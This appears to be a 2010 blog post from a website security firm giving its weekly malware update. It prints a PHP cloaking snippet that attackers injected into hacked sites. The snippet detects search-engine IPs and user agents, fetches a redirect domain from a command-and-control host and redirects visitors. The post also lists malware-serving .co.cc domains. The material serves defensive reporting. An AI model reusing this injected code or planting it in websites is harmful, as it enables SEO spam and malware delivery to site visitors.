Weekly malware update – 2010/Jan/07

Weekly malware update. You can track all updates by following our malware_updates category.

*If your site has been affected with any of these issues, contact us at support@sucuri.net or visit http://sucuri.net to get help or if you want to share some information with us.

nit-news.com + a.lobose.strangled.net

Another command and control (C&C) for blackhat SEO Spam. The attackers added the following code on the hacked sites:

if (($ip>=3639549952)&&($ip<=3639558143))$searchengine=1; //GOOGLE (216.239.32.0-216.239.63.255)<br /> if (($ip>=1123631104)&&($ip<=1123639295))$searchengine=1; //GOOGLE (66.249.64.0-66.249.95.255)<br /> if (($ip>=1089052672)&&($ip<=1089060863))$searchengine=1; //GOOGLE (64.233.160.0-64.233.191.255)<br /> if (($ip>=1078218752)&&($ip<=1078220799))$searchengine=1; //GOOGLE (64.68.80.0-64.68.87.255)<br /> if (($ip>=1078220802)&&($ip<=1078222031))$searchengine=1; //GOOGLE (64.68.88.2-64.68.92.207)<br /> if (($ip>=1087381508)&&($ip<=1087382952))$searchengine=1; //GOOGLE (64.208.32.4-64.208.37.168)<br /> if (($ip>=3512041472)&&($ip<=3512045567))$searchengine=1; //GOOGLE (209.85.128.0-209.85.143.255)<br /> if (($ip>=1113980928)&&($ip<=1113985023))$searchengine=1; //GOOGLE (66.102.0.0-66.102.15.255)<br /> if (($ip>=1208926208)&&($ip<=1208942591))$searchengine=1; //GOOGLE (72.14.192.0-72.14.255.255)<br /> if (($ip>=1249705984)&&($ip<=1249771519))$searchengine=1; //GOOGLE (74.125.0.0-74.125.255.255)<br /> if (($ip>=1475914072)&&($ip<=1475914072))$searchengine=1; //Home (87.248.169.88-87.248.169.88)<br /> if (stristr($_SERVER[“HTTP_USER_AGENT”],”googlebot”)||stristr($_SERVER[“HTTP_USER_AGENT”],”msnbot”)||stristr($_SERVER[“HTTP_USER_AGENT”],”Yahoo”)||stristr($_SERVER[“HTTP_USER_AGENT”],”search”)||stristr($_SERVER[“HTTP_USER_AGENT”],”ovguide”)||stristr($_SERVER[“HTTP_USER_AGENT”],”aol”))$searchengine=1;<br /> ..<br /> $ch = curl_init();<br /> curl_setopt ($ch, CURLOPT_URL, “http://nit-news.com/domain.txt”);<br /> curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);<br /> curl_setopt ($ch, CURLOPT_USERAGENT,”Mozilla/5.0 (Windows; U; Windows NT 5.1; en-EN; rv:1.7.12) Gecko/20050919 Firefox/1.0.7″);<br /> curl_setopt ($ch, CURLOPT_TIMEOUT, 150);<br /> $out=curl_exec ($ch);<br /> curl_close ($ch);<br /> $actual=trim($out);<br /> header(“Location: http://$actual/in.php?n=$nn”);exit;

Which contacts nit-news.com/domains.txt to get the web site to be used in the spam. It only displays the SEO Spam if the attempt comes from the Google range of IP addresses. Right now, the domain being used is a.lobose.strangled.net, but changes almost daily.

oooabterast0.co.cc and friends

Many of the hacked sites we dealt with this week had a new iframe added to the site by the attackers, then loaded malware from oooabterast0.co.cc and other sites. All of them ended up on .co.cc and were hosted at 91.217.249.55.

This is the list:

asafafaasg4.co.cc
ayaaizgeast0.co.cc
ayuieoavy4.co.cc
backconnect.co.cc
eeouyouiai4.co.cc
ffweluoiuwf.co.cc
fgsdfsdffg3.co.cc
gdfghsd4.co.cc
gdsdgsg3.co.cc
jdfhdsgs4.co.cc
oooabterast0.co.cc
sgeetguo4.co.cc
utnykgst0.co.cc
yjiuzxst0.co.cc

social-stats.info

This one infected quite a few sites this week, despite being an old malware string (we saw quite a bit of this a few weeks ago). The affected sites had a site loaded via iframe or javascript, without any obfuscation.

Most of the affected sites got hacked through stolen FTP/SSH credentials. According to Google, more than 800 sites got hacked with it.

That’s it for this week. If you have questions, email us at support@sucuri.net or visit our site: http://sucuri.net